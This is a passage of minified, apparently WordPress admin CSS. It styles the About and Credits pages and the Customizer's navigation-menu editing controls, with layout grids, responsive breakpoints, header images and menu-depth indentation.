2)}.about__section.has-1-column{margin-left:auto;margin-right:auto;max-width:36em}.about__section.has-2-columns,.about__section.has-3-columns,.about__section.has-4-columns,.about__section.has-overlap-style{display:grid}.about__section.has-gutters{gap:var(--gap);margin-bottom:var(--gap)}.about__section.has-2-columns{grid-template-columns:1fr 1fr}.about__section.has-2-columns.is-wider-right{grid-template-columns:2fr 3fr}.about__section.has-2-columns.is-wider-left{grid-template-columns:3fr 2fr}.about__section .is-section-header{grid-column-start:1;grid-column-end:-1}.about__section.has-3-columns{grid-template-columns:repeat(3,1fr)}.about__section.has-4-columns{grid-template-columns:repeat(4,1fr)}.about__section.has-overlap-style{grid-template-columns:repeat(7,1fr)}.about__section.has-overlap-style .column{grid-row-start:1}.about__section.has-overlap-style .column:nth-of-type(odd){grid-column-start:2;grid-column-end:span 3}.about__section.has-overlap-style .column:nth-of-type(2n){grid-column-start:4;grid-column-end:span 3}.about__section.has-overlap-style .column.is-top-layer{z-index:1}@media screen and (max-width:782px){.about__section.has-2-columns.is-wider-left,.about__section.has-2-columns.is-wider-right,.about__section.has-3-columns{display:block;margin-bottom:calc(var(--gap)/ 2)}.about__section .column:not(.is-edge-to-edge){padding-top:var(--gap);padding-bottom:var(--gap)}.about__section.has-2-columns.has-gutters.is-wider-left,.about__section.has-2-columns.has-gutters.is-wider-right,.about__section.has-3-columns.has-gutters{margin-bottom:calc(var(--gap) * 2)}.about__section.has-2-columns.has-gutters .column,.about__section.has-3-columns.has-gutters .column{margin-bottom:var(--gap)}.about__section.has-2-columns.has-gutters .column:last-child,.about__section.has-3-columns.has-gutters .column:last-child{margin-bottom:0}.about__section.has-3-columns .column:nth-of-type(n){padding-top:calc(var(--gap)/ 2);padding-bottom:calc(var(--gap)/ 2)}.about__section.has-4-columns{grid-template-columns:repeat(2,1fr)}.about__section.has-overlap-style{grid-template-columns:1fr}.about__section.has-overlap-style .column.column{grid-column-start:1;grid-column-end:2;grid-row-start:1;grid-row-end:2}}@media screen and (max-width:600px){.about__section.has-2-columns{display:block;margin-bottom:var(--gap)}.about__section.has-2-columns:not(.has-gutters) .column:nth-of-type(n){padding-top:calc(var(--gap)/ 2);padding-bottom:calc(var(--gap)/ 2)}.about__section.has-2-columns.has-gutters{margin-bottom:calc(var(--gap) * 2)}.about__section.has-2-columns.has-gutters .column{margin-bottom:var(--gap)}.about__section.has-2-columns.has-gutters .column:last-child{margin-bottom:0}.about__section .column.is-left-padding-zero{padding-right:0}.about__section .column.is-right-padding-zero{padding-left:0}}@media screen and (max-width:480px){.about__section .is-section-header,.about__section.is-feature .column{padding:0}.about__section.has-4-columns{display:block;padding-bottom:calc(var(--gap)/ 2)}.about__section.has-4-columns.has-gutters .column{margin-bottom:calc(var(--gap)/ 2)}.about__section.has-4-columns.has-gutters .column:last-child{margin-bottom:0}.about__section.has-4-columns .column:nth-of-type(n){padding-top:calc(var(--gap)/ 2);padding-bottom:calc(var(--gap)/ 2)}}.about__container{line-height:1.4;color:var(--text)}.about__container h1{padding:0}.about__container h1,.about__container h2,.about__container h3.is-larger-heading{margin-top:0;margin-bottom:calc(.5 * var(--gap));font-size:2rem;font-weight:700;line-height:1.16}.about__container h1.is-smaller-heading,.about__container h2.is-smaller-heading,.about__container h3{margin-top:0;margin-bottom:calc(.5 * var(--gap));font-size:1.625rem;font-weight:700;line-height:1.4}.about__container h3.is-smaller-heading,.about__container h4{margin-top:0;font-size:1.125rem;font-weight:600;line-height:1.6}.about__container h1,.about__container h2,.about__container h3,.about__container h4{text-wrap:pretty;color:inherit}.about__container :is(h1,h2,h3,h4,.about__header-text):lang(en){text-wrap:balance}.about__container p{text-wrap:pretty}.about__container p{font-size:inherit;line-height:inherit}.about__container p.is-subheading{margin-top:0;margin-bottom:1rem;font-size:1.5rem;font-weight:300;line-height:160%}.about__section a{color:var(--accent-1);text-decoration:underline}.about__section a:active,.about__section a:focus,.about__section a:hover{color:var(--accent-1);text-decoration:none}.wp-credits-list a{text-decoration:none}.wp-credits-list a:active,.wp-credits-list a:focus,.wp-credits-list a:hover{text-decoration:underline}.about__section a.button.button-hero{padding-top:1.1875rem;padding-bottom:1.1875rem;font-size:1.5rem;line-height:1.4;white-space:normal;text-wrap:pretty}.about__container ul{list-style:disc;margin-left:calc(var(--gap)/ 2)}.about__container li{margin-bottom:.5rem}.about__container img{margin:0;max-width:100%;vertical-align:middle}.about__container .about__image{margin:0}.about__container .about__image img{max-width:100%;width:100%;height:auto;border-radius:var(--border-radius)}.about__container .about__image figcaption{margin-top:.5em;text-align:center}.about__container .about__image .wp-video{margin-left:auto;margin-right:auto}.about__container .about__image svg{vertical-align:middle}.about__container .about__image+h3{margin-top:calc(.75 * var(--gap))}.about__container hr{margin:calc(var(--gap)/ 2) var(--gap);height:0;border:none;border-top:4px solid var(--accent-3)}.about__container hr.is-small{margin-top:0;margin-bottom:0}.about__container hr.is-large{margin:var(--gap) auto}.about__container hr.is-invisible{border:none}.about__container .notice,.about__container div.error,.about__container div.updated{display:none!important}.about__container code{font-size:inherit}.about__section{font-size:1.125rem;line-height:1.55}.about__section.is-feature{font-size:1.6em}.about__section.has-3-columns,.about__section.has-4-columns{font-size:1rem}@media screen and (max-width:480px){.about__section.is-feature{font-size:1.4em}.about__container h1,.about__container h2,.about__container h3.is-larger-heading{font-size:2em}}.about__header{position:relative;display:flex;flex-direction:column;align-items:flex-start;justify-content:flex-end;box-sizing:border-box;padding:calc(var(--gap) * 1.5);padding-right:26rem;min-height:clamp(10rem,25vw,18.75rem);border-radius:var(--border-radius);background-image:url("../images/about-header-default.webp?ver=20260514");background-repeat:no-repeat;background-position:right center;background-size:cover;background-color:var(--background);color:var(--text-light)}.credits-php .about__header{background-image:url("../images/about-header-credits.webp?ver=20260514")}.freedoms-php .about__header{background-image:url("../images/about-header-freedoms.webp?ver=20260514")}.privacy-php .about__header{background-image:url("../images/about-header-privacy.webp?ver=20260514")}.contribute-php .about__header{background-image:url("../images/about-header-get-involved.webp?ver=20260514")}[dir=rtl] .about__header{background-image:url("../images/about-header-default-rtl.webp?ver=20260514")}[dir=rtl] .credits-php .about__header{background-image:url("../images/about-header-credits-rtl.webp?ver=20260514")}[dir=rtl] .freedoms-php .about__header{background-image:url("../images/about-header-freedoms-rtl.webp?ver=20260514")}[dir=rtl] .privacy-php .about__header{background-image:url("../images/about-header-privacy-rtl.webp?ver=20260514")}[dir=rtl] .contribute-php .about__header{background-image:url("../images/about-header-get-involved-rtl.webp?ver=20260514")}.about__header-image{margin:0 0 calc(var(--gap) * 1.5)}.about__header-title{box-sizing:border-box;margin:0;padding:0}.about__header-title h1{margin:0;padding:0;font-size:clamp(2rem, 20vw - 9rem, 4rem);line-height:1;font-weight:600;color:var(--text)}.about-php .about__header-title h1,.contribute-php .about__header-title h1,.credits-php .about__header-title h1,.freedoms-php .about__header-title h1,.privacy-php .about__header-title h1{font-size:clamp(2rem, 20vw - 9rem, 4rem)}.about__header-text{box-sizing:border-box;max-width:26em;margin:1rem 0 0;padding:0;font-size:1.6rem;line-height:1.15;color:var(--text)}.about__header-navigation{position:relative;z-index:1;display:flex;flex-wrap:wrap;justify-content:space-between;padding-top:0;margin-bottom:var(--gap);background:var(--nav-background);color:var(--nav-color);border-bottom:3px solid var(--nav-border)}.about__header-navigation::after{display:none}.about__header-navigation .nav-tab{margin-left:0;padding:calc(var(--gap) * .75) var(--gap);float:none;font-size:1.4em;line-height:1;border-width:0 0 3px;border-style:solid;border-color:transparent;background:0 0;color:inherit}.about__header-navigation .nav-tab:active,.about__header-navigation .nav-tab:hover{background-color:var(--nav-current);color:var(--text-light);border-radius:var(--border-radius)}.about__header-navigation .nav-tab-active{margin-bottom:-3px;color:var(--nav-current);border-width:0 0 6px;border-color:var(--nav-current)}.about__header-navigation .nav-tab-active:active,.about__header-navigation .nav-tab-active:hover{background-color:var(--nav-current);color:var(--text-light);border-color:var(--nav-current);border-radius:var(--border-radius)}@media screen and (max-width:960px){.about__header{padding-right:21rem}.about-php .about__header-title h1,.contribute-php .about__header-title h1,.credits-php .about__header-title h1,.freedoms-php .about__header-title h1,.privacy-php .about__header-title h1{font-size:clamp(2rem, 20vw - 9rem, 4rem)}.about__header-navigation .nav-tab{padding:calc(var(--gap) * .75) calc(var(--gap) * .5)}}@media screen and (max-width:782px){.about__container .about__header-text{font-size:1.4em}.about__header-container{display:block}.about__header{padding:var(--gap);padding-right:17rem}.about__header-text{margin-top:.5rem}.about__header-navigation .nav-tab{margin-top:0;margin-right:0;font-size:1.2em}}@media screen and (max-width:600px){.about__header{min-height:auto;padding-right:var(--gap)}.about__header-navigation{display:block}.about__header-navigation .nav-tab{display:block;margin-bottom:0;padding:calc(var(--gap)/ 2);border-left-width:6px;border-bottom:none}.about__header-navigation .nav-tab-active{border-bottom:none;border-left-width:6px}}.about__section .wp-people-group-title{margin-bottom:calc(var(--gap) * 2 - 10px);text-align:center}.about__section .wp-people-group{margin:0;display:flex;flex-wrap:wrap}.about__section .wp-person{display:inline-block;vertical-align:top;box-sizing:border-box;margin-bottom:calc(var(--gap) - 10px);width:25%;text-align:center}.about__section .compact .wp-person{height:auto;width:20%}.about__section .wp-person-avatar{display:block;margin:0 auto calc(var(--gap)/ 2);width:140px;height:140px;border-radius:100%;overflow:hidden}.about__section .wp-person .gravatar{width:140px;height:140px;filter:grayscale(100%)}.about__section .compact .wp-person .gravatar,.about__section .compact .wp-person-avatar{width:80px;height:80px}.about__section .wp-person .web{display:block;font-size:1.4em;font-weight:600;padding:10px 10px 0;text-decoration:none}.about__section .wp-person .web:hover{text-decoration:underline}.about__section .compact .wp-person .web{font-size:1.2em}.about__section .wp-person .title{display:block;margin-top:.5em}@media screen and (max-width:782px){.about__section .wp-person{width:33%}.about__section .compact .wp-person{width:25%}.about__section .wp-person .gravatar,.about__section .wp-person-avatar{width:120px;height:120px}}@media screen and (max-width:600px){.about__section .wp-person{width:50%}.about__section .compact .wp-person{width:33%}.about__section .wp-person .web{font-size:1.2em}}@media screen and (max-width:480px){.about__section .wp-person{min-width:100%}.about__section .wp-person .web{font-size:1em}.about__section .compact .wp-person .web{font-size:1em}}.about__section .column .freedom-image{margin-bottom:var(--gap);max-height:180px}.about__section .column .privacy-image{display:block;margin-left:auto;margin-right:auto;max-width:25rem}.about-wrap{position:relative;margin:25px 40px 0 20px;max-width:1050px;font-size:15px}.about-wrap.full-width-layout{max-width:1200px}.about-wrap-content{max-width:1050px}.about-wrap .notice,.about-wrap div.error,.about-wrap div.updated{display:none!important}.about-wrap hr{border:0;height:0;margin:3em 0 0;border-top:1px solid rgba(0,0,0,.1)}.about-wrap img{margin:0;width:100%;height:auto;vertical-align:middle}.about-wrap .inline-svg img{max-width:100%;width:auto;height:auto}.about-wrap video{margin:1.5em auto}.wp-badge{background:#0073aa url(../images/w-logo-white.png?ver=20160308) no-repeat;background-position:center 25px;background-size:80px 80px;color:#fff;font-size:14px;text-align:center;font-weight:600;margin:5px 0 0;padding-top:120px;height:40px;display:inline-block;width:140px;text-rendering:optimizeLegibility;box-shadow:0 1px 3px rgba(0,0,0,.2)}.svg .wp-badge{background-image:url(../images/wordpress-logo-white.svg?ver=20160308)}.about-wrap .wp-badge{position:absolute;top:0;right:0}.about-wrap .nav-tab{padding-right:15px;padding-left:15px;font-size:18px;line-height:1.33333333}.about-wrap h1{margin:.2em 200px 0 0;padding:0;color:#32373c;line-height:1.2;font-size:2.8em;font-weight:400}.about-wrap h2{margin:40px 0 .6em;font-size:2.7em;line-height:1.3;font-weight:300;text-align:center}.about-wrap h3{margin:1.25em 0 .6em;font-size:1.4em;line-height:1.5}.about-wrap h4{font-size:16px;color:#23282d}.about-wrap p{line-height:1.5;font-size:16px}.about-wrap code,.about-wrap ol li p{font-size:14px;font-weight:400}.about-wrap figcaption{font-size:13px;text-align:center;color:#fff;text-overflow:ellipsis}.about-wrap .about-description,.about-wrap .about-text{margin-top:1.4em;font-weight:400;line-height:1.6;font-size:19px}.about-wrap .about-text{margin:1em 200px 1em 0;color:#555d66}.about-wrap .has-1-columns,.about-wrap .has-2-columns,.about-wrap .has-3-columns,.about-wrap .has-4-columns{display:grid;max-width:800px;margin-top:40px;margin-left:auto;margin-right:auto}.about-wrap .column{margin-right:20px;margin-left:20px}.about-wrap .is-wide{max-width:760px}.about-wrap .is-fullwidth{max-width:100%}.about-wrap .has-1-columns{display:block;max-width:680px;margin:0 auto 40px}.about-wrap .has-2-columns{grid-template-columns:1fr 1fr}.about-wrap .has-2-columns .column:nth-of-type(odd){grid-column-start:1}.about-wrap .has-2-columns .column:nth-of-type(2n){grid-column-start:2}.about-wrap .has-2-columns.is-wider-right{grid-template-columns:1fr 2fr}.about-wrap .has-2-columns.is-wider-left{grid-template-columns:2fr 1fr}.about-wrap .has-3-columns{grid-template-columns:repeat(3,1fr)}.about-wrap .has-3-columns .column:nth-of-type(3n+1){grid-column-start:1}.about-wrap .has-3-columns .column:nth-of-type(3n+2){grid-column-start:2}.about-wrap .has-3-columns .column:nth-of-type(3n){grid-column-start:3}.about-wrap .has-4-columns{grid-template-columns:repeat(4,1fr)}.about-wrap .has-4-columns .column:nth-of-type(4n+1){grid-column-start:1}.about-wrap .has-4-columns .column:nth-of-type(4n+2){grid-column-start:2}.about-wrap .has-4-columns .column:nth-of-type(4n+3){grid-column-start:3}.about-wrap .has-4-columns .column:nth-of-type(4n){grid-column-start:4}.about-wrap .column :first-child{margin-top:0}.about-wrap .aligncenter{text-align:center}.about-wrap .alignleft{float:left;margin-right:40px}.about-wrap .alignright{float:right;margin-left:40px}.about-wrap .is-vertically-aligned-top{align-self:flex-start}.about-wrap .is-vertically-aligned-center{align-self:center}.about-wrap .is-vertically-aligned-bottom{align-self:end}.about-wrap .point-releases{margin-top:5px;border-bottom:1px solid #ddd}.about-wrap .changelog{margin-bottom:40px}.about-wrap .changelog.point-releases h3{padding-top:35px}.about-wrap .changelog.point-releases h3:first-child{padding-top:7px}.about-wrap .changelog.feature-section .col{margin-top:40px}.about-wrap .lead-description{font-size:1.5em;text-align:center}.about-wrap .feature-section p{margin-top:.6em}.about-wrap .headline-feature{margin:0 auto 40px;max-width:680px}.about-wrap .headline-feature h2{margin:50px 0 0}.about-wrap .headline-feature img{max-width:600px;width:100%}.about-wrap .return-to-dashboard{margin:30px 0 0 -5px;font-size:14px;font-weight:600}.about-wrap .return-to-dashboard a{text-decoration:none;padding:0 5px}.about-wrap h2.wp-people-group{margin:2.6em 0 1.33em;padding:0;font-size:16px;line-height:inherit;font-weight:600;text-align:left}.about-wrap .wp-people-group{padding:0 5px;margin:0 -15px 0 -5px}.about-wrap .compact{margin-bottom:0}.about-wrap .wp-person{display:inline-block;vertical-align:top;margin-right:10px;padding-bottom:15px;height:70px;width:280px}.about-wrap .compact .wp-person{height:auto;width:180px;padding-bottom:0;margin-bottom:0}.about-wrap .wp-person .gravatar{float:left;margin:0 10px 10px 0;padding:1px;width:60px;height:60px}.about-wrap .compact .wp-person .gravatar{width:30px;height:30px}.about-wrap .wp-person .web{margin:6px 0 2px;font-size:16px;font-weight:400;line-height:2;text-decoration:none}.about-wrap .wp-person .title{display:block}.about-wrap #wp-people-group-validators+p.wp-credits-list{margin-top:0}.about-wrap p.wp-credits-list a{white-space:nowrap}.freedoms-php .about-wrap ol{margin:40px 60px}.freedoms-php .about-wrap ol li{list-style-type:decimal;font-weight:600}.freedoms-php .about-wrap ol p{font-weight:400;margin:.6em 0}@media screen and (max-width:782px){.about-wrap .has-3-columns,.about-wrap .has-4-columns{grid-template-columns:1fr 1fr}.about-wrap .has-3-columns .column:nth-of-type(3n+1),.about-wrap .has-4-columns .column:nth-of-type(4n+1){grid-column-start:1;grid-row-start:1}.about-wrap .has-3-columns .column:nth-of-type(3n+2),.about-wrap .has-4-columns .column:nth-of-type(4n+2){grid-column-start:2;grid-row-start:1}.about-wrap .has-3-columns .column:nth-of-type(3n),.about-wrap .has-4-columns .column:nth-of-type(4n+3){grid-column-start:1;grid-row-start:2}.about-wrap .has-4-columns .column:nth-of-type(4n){grid-column-start:2;grid-row-start:2}}@media screen and (max-width:600px){.about-wrap .has-2-columns,.about-wrap .has-3-columns,.about-wrap .has-4-columns{display:block}.about-wrap :not(.is-wider-right):not(.is-wider-left) .column{margin-right:0;margin-left:0}.about-wrap .has-2-columns.is-wider-left,.about-wrap .has-2-columns.is-wider-right{display:grid}}@media only screen and (max-width:500px){.about-wrap{margin-right:20px;margin-left:10px}.about-wrap .about-text,.about-wrap h1{margin-right:0}.about-wrap .about-text{margin-bottom:.25em}.about-wrap .wp-badge{position:relative;margin-bottom:1.5em;width:100%}}@media only screen and (max-width:480px){.about-wrap .has-2-columns.is-wider-left,.about-wrap .has-2-columns.is-wider-right{display:block}.about-wrap .column{margin-right:0;margin-left:0}.about-wrap .has-2-columns.is-wider-left img,.about-wrap .has-2-columns.is-wider-right img{max-width:160px}}/*! This file is auto-generated */ #customize-theme-controls #accordion-section-menu_locations{position:relative;margin-top:30px}#customize-theme-controls #accordion-section-menu_locations>.accordion-section-title{border-bottom-color:#dcdcde;margin-top:15px}#customize-theme-controls .customize-section-title-menu_locations-description,#customize-theme-controls .customize-section-title-menu_locations-heading,#customize-theme-controls .customize-section-title-nav_menus-heading{padding:0 12px}#customize-theme-controls .customize-control-description.customize-section-title-menu_locations-description{font-style:normal}.menu-in-location,.menu-in-locations{display:block;font-weight:600;font-size:10px}#customize-controls .control-section .accordion-section-title:focus .menu-in-location,#customize-controls .control-section .accordion-section-title:hover .menu-in-location,#customize-controls .theme-location-set{color:#50575e}.customize-control-nav_menu_location .create-menu,.customize-control-nav_menu_location .edit-menu{margin-right:6px;vertical-align:middle;line-height:2.2}#customize-controls .customize-control-nav_menu_name{margin-bottom:12px}.customize-control-nav_menu_name p:last-of-type{margin-bottom:0}#customize-new-menu-submit{float:left;min-width:85px}.wp-customizer .menu-item-bar .menu-item-handle,.wp-customizer .menu-item-settings,.wp-customizer .menu-item-settings .description-thin{box-sizing:border-box}.wp-customizer .menu-item-bar{margin:0}.wp-customizer .menu-item-bar .menu-item-handle{width:100%;max-width:100%;background:#fff}.wp-customizer .menu-item-handle .item-title{margin-left:0}.wp-customizer .menu-item-handle .item-type{padding:1px 5px 0 21px;float:left;text-align:left}.wp-customizer .menu-item-handle:hover{z-index:8}.customize-control-nav_menu_item.has-notifications .menu-item-handle{border-right:4px solid #72aee6}.wp-customizer .menu-item-settings{max-width:100%;overflow:hidden;z-index:8;padding:10px;background:#f0f0f1;border:1px solid #8c8f94;border-top:none}.wp-customizer .menu-item-settings .description-thin{width:100%;height:auto;margin:0 0 8px}.wp-customizer .menu-item-settings input[type=text]{width:100%}.wp-customizer .menu-item-settings .submitbox{margin:0;padding:0}.wp-customizer .menu-item-settings .link-to-original{padding:5px 0;border:none;font-style:normal;margin:0;width:100%}.wp-customizer .menu-item .submitbox .submitdelete{float:right;margin:6px 0 0;padding:0;cursor:pointer}.menu-item-reorder-nav{display:none;background-color:#fff;position:absolute;top:0;left:0}.menus-move-left:before{content:"\f345";content:"\f341"/''}.menus-move-right:before{content:"\f341";content:"\f345"/''}.reordering .menu-item .item-controls,.reordering .menu-item .item-type{display:none}.reordering .menu-item-reorder-nav{display:block}.customize-control input.menu-name-field{width:100%}.wp-customizer .menu-item .item-edit{position:absolute;left:-19px;top:2px;display:block;width:30px;height:38px;margin-left:0!important;box-shadow:none;outline:0;overflow:hidden;cursor:pointer;text-align:center}.wp-customizer .menu-item.menu-item-edit-active .item-edit .toggle-indicator:before{content:"\f142";content:"\f142"/''}.wp-customizer .menu-item-settings p.description{font-style:normal}.wp-customizer .menu-settings dl{margin:12px 0 0;padding:0}.wp-customizer .menu-settings .checkbox-input{margin-top:8px}.wp-customizer .menu-settings .menu-theme-locations{border-top:1px solid #c3c4c7}.wp-customizer .menu-settings{margin-top:36px;border-top:none}.wp-customizer .menu-location-settings{margin-top:12px;border-top:none}.wp-customizer .control-section-nav_menu .menu-location-settings{margin-top:24px;border-top:1px solid #dcdcde}.customize-control-nav_menu_auto_add,.wp-customizer .control-section-nav_menu .menu-location-settings{padding-top:12px}.menu-location-settings .customize-control-checkbox .theme-location-set{line-height:1}.customize-control-nav_menu_auto_add label{vertical-align:top}.menu-location-settings .new-menu-locations-widget-note{display:block}.customize-control-menu{margin-top:4px}#customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle{color:#50575e}.customize-screen-options-toggle{background:0 0;border:none;color:#50575e;cursor:pointer;margin:0;padding:20px;position:absolute;left:0;top:30px}#customize-controls .customize-info .customize-help-toggle{padding:20px}#customize-controls .customize-info .customize-help-toggle:before{padding:4px}#customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active,#customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus,#customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover,.active-menu-screen-options .customize-screen-options-toggle,.customize-screen-options-toggle:active,.customize-screen-options-toggle:focus,.customize-screen-options-toggle:hover{color:var(--wp-admin-theme-color)}#customize-controls .customize-info .customize-help-toggle:focus,.customize-screen-options-toggle:focus{outline:2px solid transparent}.customize-screen-options-toggle:before{-moz-osx-font-smoothing:grayscale;border:none;content:"\f111";content:"\f111"/'';display:block;font:18px/1 dashicons;padding:5px;text-align:center;text-decoration:none!important;text-indent:0;right:6px;position:absolute;top:6px}#customize-controls .customize-info .customize-help-toggle:focus:before,.customize-screen-options-toggle:focus:before{border-radius:100%}.wp-customizer #screen-options-wrap{display:none;background:#fff;border-top:1px solid #dcdcde;padding:4px 15px 15px}.wp-customizer .metabox-prefs label{display:block;padding-left:0;line-height:30px}.wp-customizer .toggle-indicator{display:inline-block;font-size:20px;line-height:1}.rtl .wp-customizer .toggle-indicator{text-indent:1px}#available-menu-items .accordion-section-title .toggle-indicator:before,.wp-customizer .menu-item .item-edit .toggle-indicator:before{content:"\f140";content:"\f140"/'';display:block;padding:1px 0 1px 2px;border-radius:50%;color:#787c82;font:normal 20px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none!important}.control-section-nav_menu .field-css-classes,.control-section-nav_menu .field-description,.control-section-nav_menu .field-link-target,.control-section-nav_menu .field-title-attribute,.control-section-nav_menu .field-xfn{display:none}.control-section-nav_menu.field-css-classes-active .field-css-classes,.control-section-nav_menu.field-description-active .field-description,.control-section-nav_menu.field-link-target-active .field-link-target,.control-section-nav_menu.field-title-attribute-active .field-title-attribute,.control-section-nav_menu.field-xfn-active .field-xfn{display:block}.menu-item-depth-0{margin-right:0}.menu-item-depth-1{margin-right:20px}.menu-item-depth-2{margin-right:40px}.menu-item-depth-3{margin-right:60px}.menu-item-depth-4{margin-right:80px}.menu-item-depth-5{margin-right:100px}.menu-item-depth-6{margin-right:120px}.menu-item-depth-7{margin-right:140px}.menu-item-depth-8{margin-right:160px}.menu-item-depth-9{margin-right:180px}.menu-item-depth-10{margin-right:200px}.menu-item-depth-11{margin-right:220px}.menu-item-depth-0>.menu-item-bar{margin-left:0}.menu-item-depth-1>.menu-item-bar{margin-left:20px}.menu-item-depth-2>.menu-item-bar{margin-left:40px}.menu-item-depth-3>.menu-item-bar{margin-left:60px}.menu-item-depth-4>.menu-item-bar{margin-left:80px}.menu-item-depth-5>.menu-item-bar{margin-left:100px}.menu-item-depth-6>.menu-item-bar{margin-left:120px}.menu-item-depth-7>.menu-item-bar{margin-left:140px}.menu-item-depth-8>.menu-item-bar{margin-left:160px}.menu-item-depth-9>.menu-item-bar{margin-left:180px}.menu-item-depth-10>.menu-item-bar{margin-left:200px}.menu-item-depth-11>.menu-item-bar{margin-left:220px}.menu-item-depth-0 .menu-item-transport{margin-right:0}.menu-item-depth-1 .menu-item-transport{margin-right:-20px}.menu-item-depth-3 .menu-item-transport{margin-right:-60px}.menu-item-depth-4 .menu-item-transport{margin-right:-80px}.menu-item-depth-2 .menu-item-transport{margin-right:-40px}.menu-item-depth-5 .menu-item-transport{margin-right:-100px}.menu-item-depth-6 .menu-item-transport{margin-right:-120px}.menu-item-depth-7 .menu-item-transport{margin-right:-140px}.menu-item-depth-8 .menu-item-transport{margin-right:-160px}.menu-item-depth-9 .menu-item-transport{margin-right:-180px}.menu-item-depth-10 .menu-item-transport{margin-right:-200px}.menu-item-depth-11 .menu-item-transport{margin-right:-220px}.reordering .menu-item-depth-0{margin-right:0}.reordering .menu-item-depth-1{margin-right:15px}.reordering .menu-item-depth-2{margin-right:30px}.reordering .menu-item-depth-3{margin-right:45px}.reordering .menu-item-depth-4{margin-right:60px}.reordering .menu-item-depth-5{margin-right:75px}.reordering .menu-item-depth-6{margin-right:90px}.reordering .menu-item-depth-7{margin-right:105px}.reordering .menu-item-depth-8{margin-right:120px}.reordering .menu-item-depth-9{margin-right:135px}.reordering .menu-item-depth-10{margin-right:150px}.reordering .menu-item-depth-11{margin-right:165px}.reordering .menu-item-depth-0>.menu-item-bar{margin-left:0}.reordering .menu-item-depth-1>.menu-item-bar{margin-left:15px}.reordering .menu-item-depth-2>.menu-item-bar{margin-left:30px}.reordering .menu-item-depth-3>.menu-item-bar{margin-left:45px}.reordering .menu-item-depth-4>.menu-item-bar{margin-left:60px}.reordering .menu-item-depth-5>.menu-item-bar{margin-left:75px}.reordering .menu-item-depth-6>.menu-item-bar{margin-left:90px}.reordering .menu-item-depth-7>.menu-item-bar{margin-left:105px}.reordering .menu-item-depth-8>.menu-item-bar{margin-left:120px}.reordering .menu-item-depth-9>.menu-item-bar{margin-left:135px}.reordering .menu-item-depth-10>.menu-item-bar{margin-left:150px}.reordering .menu-item-depth-11>.menu-item-bar{margin-left:165px}.control-section-nav_menu.menu .menu-item-edit-active{margin-right:0}.control-section-nav_menu.menu .menu-item-edit-active .menu-item-bar{margin-left:0}.control-section-nav_menu.menu .sortable-placeholder{margin-top:0;margin-bottom:1px;max-width:calc(100% - 2px);float:right;display:list-item;border-color:#a7aaad}.menu-item-transport li.customize-control{float:none}.control-section-nav_menu.menu ul.menu-item-transport .menu-item-bar{margin-top:0}.adding-menu-items .control-section{opacity:.4}.adding-menu-items .control-panel.control-section,.adding-menu-items .control-section.open{opacity:1}.menu-item-bar .item-delete{color:#d63638;position:absolute;top:2px;left:-19px;width:30px;height:38px;cursor:pointer;display:none}.menu-item-bar .item-delete:before{content:"\f335";content:"\f335"/'';position:absolute;top:9px;right:5px;border-radius:50%;font:normal 20px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.menu-item-bar .item-delete:focus,.menu-item-bar .item-delete:hover{box-shadow:none;outline:0;color:#d63638}.adding-menu-items .menu-item-bar .item-edit{display:none}.adding-menu-items .menu-item-bar .item-delete{display:block}#available-menu-items.opening{overflow-y:hidden}#available-menu-items #available-menu-items-search.open{height:100%;border-bottom:none}#available-menu-items .accordion-section-title{border-right:none;border-left:none;background:#fff;transition:background-color .15s;-webkit-user-select:auto;user-select:auto}#available-menu-items #available-menu-items-search .accordion-section-title,#available-menu-items .open .accordion-section-title{background:#f0f0f1}#available-menu-items .accordion-section-title:after{content:none!important}#available-menu-items .accordion-section-title:hover .toggle-indicator:before,#available-menu-items .button-link:focus .toggle-indicator:before,#available-menu-items .button-link:hover .toggle-indicator:before{color:#1d2327}#available-menu-items .open .accordion-section-title .toggle-indicator:before{content:"\f142";color:#1d2327}#available-menu-items .available-menu-items-list{overflow-y:auto;max-height:200px;background:0 0}#available-menu-items .accordion-section-title button .toggle-indicator{display:flex;align-items:center;width:28px;height:35px;position:absolute;top:5px;left:5px;box-shadow:none;outline:0;cursor:pointer;text-align:center}#available-menu-items .accordion-section-title .no-items,#available-menu-items .cannot-expand .accordion-section-title .spinner,#available-menu-items .cannot-expand .accordion-section-title>button:not(#available-menu-items-search button.is-visible){display:none}#available-menu-items-search.cannot-expand .accordion-section-title .spinner{display:block}#available-menu-items .cannot-expand .accordion-section-title .no-items{float:left;color:#50575e;font-weight:400;margin-right:5px}#available-menu-items .accordion-section-content{max-height:290px;margin:0;padding:0;position:relative;background:0 0}#available-menu-items .accordion-section-content .available-menu-items-list{margin:0 0 64px;padding:1px 15px 15px}#available-menu-items .accordion-section-content .available-menu-items-list:only-child{margin-bottom:0}#new-custom-menu-item .accordion-section-content{padding:0 15px 15px}#available-menu-items .menu-item-tpl{margin:0}#available-menu-items .new-content-item .create-item-input.invalid,#available-menu-items .new-content-item .create-item-input.invalid:focus,#custom-menu-item-name.invalid,#custom-menu-item-url.invalid,.edit-menu-item-url.invalid,.menu-name-field.invalid,.menu-name-field.invalid:focus{border:1px solid #d63638}#available-menu-items .menu-item-handle .item-type{padding-left:0}#available-menu-items .menu-item-handle .item-title{padding-right:20px}#available-menu-items .menu-item-handle{cursor:pointer}#available-menu-items .menu-item-handle{box-shadow:none;margin-top:-1px}#available-menu-items .menu-item-handle:hover{z-index:1}#available-menu-items .item-title h4{padding:0 0 5px;font-size:14px}#available-menu-items .item-add{position:absolute;top:1px;right:1px;color:#8c8f94;width:30px;height:38px;box-shadow:none;outline:0;cursor:pointer;text-align:center}#available-menu-items .menu-item-handle .item-add:focus{color:#1d2327}#available-menu-items .item-add:before{content:"\f543";content:"\f543"/'';position:relative;right:2px;top:3px;display:inline-block;height:20px;border-radius:50%;font:normal 20px/1.05 dashicons}#available-menu-items .menu-item-handle.item-added .item-add:focus,#available-menu-items .menu-item-handle.item-added .item-title,#available-menu-items .menu-item-handle.item-added .item-type,#available-menu-items .menu-item-handle.item-added:hover .item-add{color:#646970}#available-menu-items .menu-item-handle.item-added .item-add:before{content:"\f147";content:"\f147"/''}#available-menu-items .accordion-section-title.loading .spinner,#available-menu-items-search.loading .accordion-section-title .spinner{visibility:visible;margin:0 20px}#available-menu-items-search 